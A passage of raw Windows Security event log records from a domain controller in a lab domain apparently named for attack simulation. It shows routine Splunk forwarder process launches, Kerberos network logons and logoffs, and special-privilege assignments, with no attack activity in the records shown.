Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x182c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265089
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1990
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265088
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265090
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265091
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1550
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265093
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265092
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1778
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265096
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B9B2F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:56:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265095
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8B9B2F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64971
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:56:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265094
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B9B2F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:57:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265097
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265099
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265098
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:57:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265100
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:57:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265102
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:57:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265101
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:57:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265103
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1748
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265109
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8BD976
Logon Type: 3
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265108
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8BD988
Logon Type: 3
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265107
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD9AA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59BF5E39-EF3C-C4F1-62B6-4D331A885FBB}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54218
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265106
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD988
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54217
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265105
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD976
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54216
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:57:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265104
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BD93F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 54214
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265115
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDCB7
Logon Type: 3
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265114
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BDCB7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64981
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265113
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDCB7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265112
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDC4B
Logon Type: 3
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265111
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BDC4B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64980
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265110
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BDC4B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:57:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265116
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
